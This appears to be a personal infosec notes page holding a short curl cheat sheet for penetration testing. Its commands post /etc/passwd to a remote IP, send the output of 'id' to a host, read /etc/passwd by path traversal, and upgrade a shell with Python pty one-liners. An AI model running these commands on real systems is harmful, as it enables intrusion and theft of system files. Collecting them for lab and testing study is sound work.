akde/infosec

Information security is ultimately about managing risk

Curl

Write into a file:

curl $url -o /tmp/f.txt
curl $url --output /tmp/f.txt
curl $url > /tmp/f.txt

Post a local file:

curl -X POST --data-binary @/etc/passwd http://192.168.49.53:21/

Exe­cute com­mand and return the result:

curl -d q=`id` http://localhost:21/

With a header

curl --header "Host: localhost" 10.10.10.10

Use the cor­rect path also with ../ (use­full for file tra­ver­sion attacks):

curl --path-as-is $target:$port/public/../../../etc/passwd

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';